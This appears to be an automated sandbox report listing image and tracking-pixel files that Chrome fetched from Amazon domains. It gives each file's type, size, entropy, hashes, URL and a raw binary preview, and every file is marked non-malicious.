                                                                                                                                                                                                                                                                Preview:......JFIF.............C....................................................................C.........................................................................,..............................................T..............................!.1."AQ.2a.#Bq.$R..b....%349Sr...67CTcsuvw.............................................I..........................!1A.."Qaq..2....BR....#b...4r.....$Sc.5s%3...............?..~...%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.*..p.L.FV......_.;%H#.gZ.x...-...S.....e.P....1. P..5.....6.T.R.y..../...m=....W.};.+..U......QX.d.+g.t......... ^&.....i.sJ.C. y.........m.%.'.|...X..OMm=..P.V......t..W....=.&R..Fq.......Y....fL...w...W.?...7.4....w.V.S...X..y.7.#....Ts.v.:wY......g..4Ceh...W.,.le.#*H.C..-R&.JpQ.A.R0..P1H.pz...P-o..s.{.p.1;.J....q{.o.Y......OL<Mn..C.2..N@..$,+.=..[..l.v.<Y.D}.f.~@M4LE...16.R.X~-..<.;i.q......0.8.d........^............i...`.......U.\[.X..P2.A.U..=.`.....c.z.Qc..........7....}..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):9592
                                                                                                                                                                                                                                                                Entropy (8bit):7.81047369607546
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:DdOP5Z68CjM4mdtOXnQHYyV3TZAcV+vVUvwr61hAKgosX33+Wboeiq8GtT7Tj:DdOP5Z68CI4oMQ4yVjZAcVVPkBosXnbT
                                                                                                                                                                                                                                                                MD5:C58A37C86EE43A0BA62A0CA28F544A60
                                                                                                                                                                                                                                                                SHA1:730FDE384CC19A173B699D574E70C2E795532961
                                                                                                                                                                                                                                                                SHA-256:B4209A2A49CD50272F2068AB4AACEEAD50C2BF77EC387FBC2F9909EF3968D4AF
                                                                                                                                                                                                                                                                SHA-512:A31917DC2E2056D4E2F5A7642B92CA6D712E6E2A64A0580E64401757506C008630991C39777CCD40D9522C514841099F1201C47E83138CD0E5C1A50D9408C543
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/31ulQWhB89L._SR480,440_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................X.........................................................................8.3Q..(.$.....I"..:......[..nS..O.-..*].....r............bN..*Z..~zzH...|Me2..i?.v..Jq.+....F.:cmZ..G.[|.......R..x......mFk.....t...m.3..;4...@..........@.W.)_...?...v(=.3...N3..`.[M-R..lo.v.....l.....7_~[h.7....^.D-b...].mw.r.../....|{..^.............1.E.._=.t..1H............F...K....6..=S'\.o.l....'.....>..O..T..'coJ5.7.&..g.7.<y.>m...........+vJ..d\.]..-...C{{ME.o..{m.})..l#...[.E.h...K.._]VN.i.Y..jY....U..v.I.LUk.Zu..g2...{..m.$.............2".8..z.\J.........w...n...gzh.....*.w~.8+..m.l.vU/J.......y.q..c..oZ.i...?ax..\...............].B`...!....1......n....'..vi.l.4.zv..d.N{...V>..Z...HM.....I...^..............^.WD...<}.z7yh..C.....w.\.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5960
                                                                                                                                                                                                                                                                Entropy (8bit):7.925336296185083
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TUhN23J0t+FVc1ImMb6zM9KeLoP95zgH0DWempBXIXvb7vb7mkBMouKGytV64dzn:64Z0t31aV9Kb0HHem7XI//z7mk6kG86m
                                                                                                                                                                                                                                                                MD5:A5DEEA0509DC93005F0E54A6ACA2D493
                                                                                                                                                                                                                                                                SHA1:44945C72E805EFB9CD0636FDF1502052C797CE8B
                                                                                                                                                                                                                                                                SHA-256:BDBDAE1E0A59B88F22438781831D971A597CC15814A06142B23978CFEF28C5B1
                                                                                                                                                                                                                                                                SHA-512:7ED90AC663C95250FE1F85B722E40FA08AD8C3F3E8A7FC047AC8D4A67F227B6DB5AB3C7DD8B1D79B13EC4F07267A883E7F6A68578D3AF1E635BE8B45CCC895D5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!."1.A.Qa..#q$2b....34Sc...R........................................................!1.AQ."2aq...b....BS................?..V...)JQ....)JQ....)JQ....)JQ....)JQ....)JQ....+Zk.............;k...e...F..Q......b..../......$.kA...{.o.H..31...O....\.= .6.v/..r....8<...?.QK......9+..*.<7....*.r...p...I....@.....WA..U..[c.$.....+.]j..+b~.K........yP.k.,...>~.8...........x..>$.@r...s.y.._...q.#..!....t..Q.Q. .g.<.i ...U......;P.=.......f.}P.z[...I.....U.-O...R.O. p.rYC.J....q.Q....[.(.2.3.1^[...9..8.U)...s#..<.g....u...=..9y|.........g-.......Ub6%....B...P*....Zi.T...v.............3...+B.......x..j..M.K..$k..ex..UU.Km...U_.FX..f.c..Qs;.v.M.s.ij......Vm"y.-ey.%.?%AT.,;...T.4...}}..8..t..1..m.K.......h....H...w<..U`....x.c.....].|.V.....I..n..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D17513%26pc%3D41698%26at%3D41698%26t%3D1723469044696%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41697
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4609
                                                                                                                                                                                                                                                                Entropy (8bit):7.778924653979158
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TQMbb80J98CbVb7egx5vztB+NkvymEOWzQ7dE5sKhwZm+OM8QF3:lHn7e0vb+Nkv3dWkJisKum+R
                                                                                                                                                                                                                                                                MD5:2D98B4FFD376F3A10C7762AF8FA488B7
                                                                                                                                                                                                                                                                SHA1:67D564DAF90D716D3145B7BF084B0A85611150A2
                                                                                                                                                                                                                                                                SHA-256:FE690149BED5EAE0F2D75A581B869E78EB94F887A4A6ABE0107EDDEDCBDD39D9
                                                                                                                                                                                                                                                                SHA-512:3F51B652DD5DA2EDD190885EA057096DD34A9CBCD6C778CCBB7012B2DB08B0B1F4148275BC1CEA25E6E4FDDB57F30B91B5F1B3ECBE117B1BB603A797DDC4FB70
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/31zt7qzs+xL._SR240,220_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................,......r..f.................... N.7.................".'.nKvk.\..k;7x.......<....{....[..6r_K...u..o..i.u^.o.=..w.*.....J.f..*R..E.6.E..k....)..2..>.R.......+CB..IJMc\g`.)..M#P.nz9.<.Gb.O..m......h."])J.Q*..JE.#..D].t.Q..^>]...F......._.4....h.l.O;....4........}.R. ....(s..])V.u/...c....<$M.m..K..,.>..~.....R.9._:L...o.&"....-.u..G.f.g.F.....R..I.$J^..&.....L'....I..w4.t..Mi[3.......&C.)fd.E......n.F....m$..;.t.o..Y........WL.f..WI..N.....L5[6Hg..7 ....N...w.._..1vP...../.N.T.......c?..o..9.W....?...+........................!2...01@. 3A."$BC...........OY....3.~i).U....c..g.R:...E.B&../.1I.....-...........?{T;G8.......)+!...#..q.........dg..I..uQ..@......m!j4..T4....W....&..r.<z.~J....\.w..t..;..P#.V.W..^u.:.w..].....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 194x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):17386
                                                                                                                                                                                                                                                                Entropy (8bit):7.971713661182734
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:JUcmXhN6RZjXoTPqp55WLsiezBAL7qxANuVjAKh+Yd:EcJUPq/5Li13wd
                                                                                                                                                                                                                                                                MD5:EB75FB05C12CD16CF99139F3C55A3FFF
                                                                                                                                                                                                                                                                SHA1:631713C03B4CB099AD5DE773EB71C2D479D05365
                                                                                                                                                                                                                                                                SHA-256:29584E56D34D57493839A07B2067668192037DF524FC7E4443752754D26622BA
                                                                                                                                                                                                                                                                SHA-512:94A949D056A156AA27087B4DD6201ECE0AE51157232D417A4FAEFF14FCC413CE2FA04811F8469549A81B044E52DB427FFAACACAB858F781C31A06831508D56F6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71VOSLOz4+L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1"A..Q2Raq..#B..$3CS..DUb....%...4Tru......................................................!1..."Aaq..2Q.....#b....B....C.............?..n..a.B`.E.....0D@n;..G.......0.f.z........1~0J.y.}i....%$.#.5ZF.;...`0.....u.oG..L..x.kz.W..e......O...[..!...W.N.....}....De....s...X.}GIB......>../u...J......U...Bwx.3X.=)........p.@n$w..h..?..2..B/...9-....DQ)7.. D..fU...C.=.......R....R......a.m.#n.....se..Sc...u.m...."..F!. .\..<.......S<.......)...X..x.7..>..R..|........c...5.K.... D.I.y.~...3o....<s...h&C.^.}X.].<d2.qC.......W...|.bM.{pG.....Q7y...U7O...^.&..~.D.q*.......#R.e.q.N.....G^..M.+..........O...s.m...Z...X.\..Ct.r...97.[T"...S..=...~.w..d.N..FP.....u...V...[..p_....}.Hu"n...jZ.N.ar..Y.9.(...<. .o.X........h.V.W.(.,.......w*@..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3979
                                                                                                                                                                                                                                                                Entropy (8bit):7.85072421974962
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:ToJVbbboVzpSm6kHbbBiF3AF9QboUuanTtSwuHLa297:4bbboVVv6AbbsAvQboXacwuHLBZ
                                                                                                                                                                                                                                                                MD5:4897A0E2804E72BAC86C225EE2277FA9
                                                                                                                                                                                                                                                                SHA1:776951FC8301A5D5416C679866C596EB630509F7
                                                                                                                                                                                                                                                                SHA-256:015DD031D38FB8BABF0A2DCE80F228613D4761EE0E0C81E90C76C6F46F6FF9AB
                                                                                                                                                                                                                                                                SHA-512:0C458B10B38568588F6D1E35214F0D797CEF4324B4EBA6DEE32F99AFA4ECA8FA2540DD75261B130F364A7FE651E76FB33A6131EB611BE40C3D4F4210DB585C2E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!...1AQ..."2Brst345aq...#$..&6CRc..%Td..............................................1.!Q............?..h...................Ah......5..p5.n.....D..=.....sS.}..s.5;^.D.......teH%./..hgYk....V.g...#*0.RF...4...!.l........_G....O....&...X.}DD.D@DD.D@DD.D@DD.D@DD...Z...,.pO;.o`$..=.'.d.q..!=...Q.2r.K..Q....I]#...g.t.z.A.d......cO.#....W.,..Z......(....:....C.H...i).1...s^%.H.s..51-r1........h.4V.....g..L.nR..Z...5..J....N%2.........K5U,.k]!....yZ2..hg.h|n.wh9..u..F.Gt...t......{@..%.#.=.....<,_.C.m..........$..........................W.&."..5..J...8.8/.@...!X.Oo..._../...../\d...m.UT.Hb0.i..D.U...........~.Y....SS....7.\2KO).z..i...'S..5]u..+g..1.....L.,*.../........X......SG...B3..ZHU..5...H....A$....=.VR.3A[.&.V4..)..U.e...{.;Ml
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):1866
                                                                                                                                                                                                                                                                Entropy (8bit):7.6943040406752505
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r1a8+fK/YJpXsO3sGVXqCQFZAT7oOLu/W/ABrU:TzRpVj8GMxZAQOye/kI
                                                                                                                                                                                                                                                                MD5:CC66B764E2A645A7EAE8ED82E072E766
                                                                                                                                                                                                                                                                SHA1:FDC753835DB56C90114C62C9E06EC52204DE675C
                                                                                                                                                                                                                                                                SHA-256:9B73840D71D7735B82C3FEC0729783F40CDFD295810EBE09A2C87FD617C84AFA
                                                                                                                                                                                                                                                                SHA-512:382E1EDF4EE31DEF46449D21AE2F95E6267077F643A756E59D85516FDEC81E2DB7DC3A3F03605D4FF64D9B6EB791AB4396BFF0D302FCD5ED6A264FA5F4BD2EB0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_AllAudio_1x._SY116_CB659040113_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!..AQa."12qr.B.......CS.#$bc............................................!A1............?..............$..1.H..1...;.h..I...Z.j....Yd0S....<.G...a.RZG..A.}...`5.\%.7...l>...6.M.$.....3....D...R.&...H\(." ""." ""." "+k..Va.U]...F.a..~.o.Wr....n..o..+...j....-../Qp.._.J.}d.|...9..K.qq..s*Y.d..Ew.G..?q,..5V~.....Oqs.&...q..Z.@o..`Z.;..r> .t[S|b`.<f......AZ.t%..G....ve....5s;zfoG+..-3.!_j;..+L...1.M[H....D(." ""." ""." (......Kg..N..}....3..c..f..I<..j.;..........I....J.....My..#.]./H.....lP..d........\=..5.g.j_.G.W..~..RR>$.@.%q.1.$.....8h{Q.....[....m.^*..V.t..o.T!...6..!Y....cI}.=?.R%a..R.V....X..4..T.""." ""." ".@'@...}..0..V..,b&z.....+^..V.y.....@.wH.I]........g...<i...chc..o.......p..fz..c.V%l[.Y...l..t.L..{...?y*..{h.....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):15564
                                                                                                                                                                                                                                                                Entropy (8bit):7.929041309669881
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:AWNe9qpq88Q6fvXDwuFutf0sMmMcM5+ttRZxViYx:4E6nX9wN0sBvJxXx
                                                                                                                                                                                                                                                                MD5:82DD3020DD812A65BA785F498E7238C7
                                                                                                                                                                                                                                                                SHA1:B7663E459F95EAD65839D55790435DE9D1C2343D
                                                                                                                                                                                                                                                                SHA-256:B5B3B5AD1EB00BD367A41C693C940EA976C75B124578CFC6BA12B69641C686AC
                                                                                                                                                                                                                                                                SHA-512:6808DEA02213CC436CBF5CF9D14D87907140CC2322109EC5BE2B85CDBC793535F87FDBFF129F424F2FF5653E4F568DF87B54DEC919D02A7E28717A908A006A6C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/71b4SNq8EUL._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........4........................................................................c[.O..nV... /o ...?...?D..n..................=...y..M.......vK....j...hV9...y..'........................V3.|..nyaNS+....2.<r@.+..".=0.....z.G.3.:.6.@.............r.9~.pV.T.Ays..O.~.w.wD..5.^cR............:.w~j....byf@............C.~~..F;.`..q.....^.BJ.*.....2.\ND.}...D..k.m..`...a....>...............,..1J...,.nf+....T.V....K...&..[........K......K..&.......s_I...@..........`.:.#..O.Y.!1.<..^.[..e.....K..</.......ld...w...*t..+V.lkm.V...1S.....>s.uy.................A......V[D\B.....v..U.[...U..TO~..o<>...<...nc...(..d..s..c"...L...1...~...........q...q.z...........A...T....6..`.....%.b..........+.3..........+_YU$.......$......_.?K{.~.Y.[G...7./..........C.M.9....i.f..v..AZ....9.._^tn.Z........K
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6230
                                                                                                                                                                                                                                                                Entropy (8bit):7.540158814434573
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TBSnc5c596iAUHOsF6kPU+Y/PSOiqtd5CzGViOkhgaOkZ7BpTNMTTbj/ZM:Oc5ClusFtPU+Y/hrtdcNhekZ5MTLu
                                                                                                                                                                                                                                                                MD5:6129894957981525D61B4F90F6CF310A
                                                                                                                                                                                                                                                                SHA1:1BB3C735ECC0D9E681B8B6F19638E6B164F8502A
                                                                                                                                                                                                                                                                SHA-256:A8127B064C45B5F10B031F3985D5E13E12872C5D5F289D7731E38BA1960364B7
                                                                                                                                                                                                                                                                SHA-512:4F537B6593513277EE2DDFC4803258412174F22AD80D4E45A0F90E478961471BD022734B6364FAC7F7E5777D96AA77CB3B9CFE204071015C9EF267CD206BE8D0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........2.................................................................................................................................................................................................................................................................................................................S.....e..r....................>...,.....AAN.Y.+....].4....................<.w...pS.vx..5.1....................#.c.E....N...9.g...]d.k............................^.;....%..:.Q...g@.......89q.0......`..P....I..FV,....GW....r_N.{..s.vSq...... .......qK.eZ.......]"..o.v.X.9..}o.U`,..............1.....f4......1.o.c.....=...yh...kg.(.r~Zn1.|..B..A.O..J._.X............5.'.'Un.Z=..k..{Y...+s".f..E.x.{......3'..6...x...=.0.i..d....?Y......~5.:.....>..=qj.p..7.'.:.h9.;)).h*..Q..(.......7{l..jm..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):8696
                                                                                                                                                                                                                                                                Entropy (8bit):7.945387105773964
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:djjg2Fxs7FsDAEOgd/wb/Jqph/xpHptmnWj34aC2Mf02Ut9uJb:hj7WkAbWYAphZpHvjje0fIb
                                                                                                                                                                                                                                                                MD5:D58FAFC02872E5933D6FF0F33C149B6C
                                                                                                                                                                                                                                                                SHA1:F02D9431AC77559022B63AF2974E0E0910047FE1
                                                                                                                                                                                                                                                                SHA-256:EE901234D7414450F8B67A7697A39B5DA73C33A49DEDA7773B94780FC8937138
                                                                                                                                                                                                                                                                SHA-512:D0062E25BE7AE5CE2253CB777F5DEDD666BE38222967AC220099A360C4A1CACC9E49689D5D92EBFE8F962F7843ADC17E9A45783B66F61F11F407D3B0CBBD2925
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/617GtbtSffL._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!1..AQa"q...2B....3Rr...#Cb....$4c....%s.................................................!1.AQ..2.".#3aq..............?...E.P.E.P.E.P.E.P.E..E..|h......z.$....{..En.i. \..YjWB.>G4R?..OA.or5q...N..}vb..u"X..... 2........e..~@...l.....[....s.3..P1..b/.d6.O..na.SK..z...Ee.k...G....E.....[..=.G&.1.. .O.#S....D......[^...+.E........#eL..O...-.@".. ..-......O...).-.^....{...H...>.n..2...>L6~.,.j.d.(V.2(.PQE..QE..QE.....O.{..M..w..0F([hZ.....Ohxm..&.I.x._...db..]...U._....J...b..c.s....WvL...U..]sq...m,...)..l]./|.9...d.eO..V.sl.U.9.rk..R.....&.f.4h}$R[..B.L........6^[...]g.o..X.....u.F.,..Q..rB.>!.....p.>>....q.$......?.x_.0.;?#r..Fh....w........}.M.4E...>.Yv...\.M..G..Of..h.d..Bj.*...*.G..xxn...T....8......y_p\....^.E.mZ.'h.e.1.-......
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 150x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):9905
                                                                                                                                                                                                                                                                Entropy (8bit):7.957682355164608
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:aLOsq6HtEMeO47mbwdZE8B4Ur/xbd8Fok3eHaBgx+TUWKgbv2RavT0xjpHXoED:OOfiymGld8Fo1Occv7vQx13j
                                                                                                                                                                                                                                                                MD5:F79E190CB81C1E1A832BC099923C1C9B
                                                                                                                                                                                                                                                                SHA1:E3D06DB42E3BC42410FA5A5C137F5636387507D4
                                                                                                                                                                                                                                                                SHA-256:8B62303673685107C6CA7B457468A8B14B471F6593B6C1FA85061857348D4031
                                                                                                                                                                                                                                                                SHA-512:7B2CF77A6F97B2A5A060BE3B1802A1338AF2A446091F8F8EBA598CC5C3B17A99F73B287C78FC0A71F8FF8971C6AD30C7845052196F7C8B2AE2365EDFF8C80EF1
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/716nKw-6UxL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1A"Qa..2q..#...BRUr...C....35DTst.$...................................................!.1A..."2QR..q....#$a3BSb.............?.....=...0`.......C...!..0`.0`....{.......HagRf..vv...8._e..v...S.......jiV_.&.H..P.......k......\.`....?.....y..H%......BD.H..t4o.J....pq.6o^...hPr....a#.H..o=....R.....'..r......._..L.....Y.....L.....z..di`.....d7Bm.S.~...l.......r...Q{u........4..$....0`...3$@.P|...'..'1X#...%...%K.@...b..vL2cm,..#....6e...A].B...A..9.V...mW.O....7.+k}+.1..^....xc1..a[,...a..U"..&....(..#....8X.W......l.d8P.%.h./%..3HMW:......VH...SpS.Q....u.....DO.....1.8..M^N..l....v...../.&.../.l...Q.FR.u-.._..3.<....X.RFF.E@...Y...khk.i".A..<..U..5 .A...`.....`...!.....:[.Qd.jdjoz....!.i......8kp.....|.....2.a.....P.Yu*....kt}m:}C..Wln.U.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 154x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):8633
                                                                                                                                                                                                                                                                Entropy (8bit):7.952737671643566
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:uZ9ZW8nHZyvMiBpKZ3tlhEzS2+R9+RJV4rtJZf:UrJHQvnBpKxLbARgrt/f
                                                                                                                                                                                                                                                                MD5:E113F185D38E0B25CA978445F7627960
                                                                                                                                                                                                                                                                SHA1:1C41221EB4DE3064B81EF3DF17040048EED99B36
                                                                                                                                                                                                                                                                SHA-256:AD2F18835CF9CC99652F9A836DD29346287DCFA8CC2CCEAC2D24441950C22F0E
                                                                                                                                                                                                                                                                SHA-512:08E9634A14CAFB0C4D4C6EE553E22F0EC172C3350D28AF87D4D574FA9FA6D4BB0BC984679B10C890240DB40A75B6FF20AA948B74F4EACB6259F87CB03B9ADA06
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71qrtZlAzuL._AC_SY200_.jpg
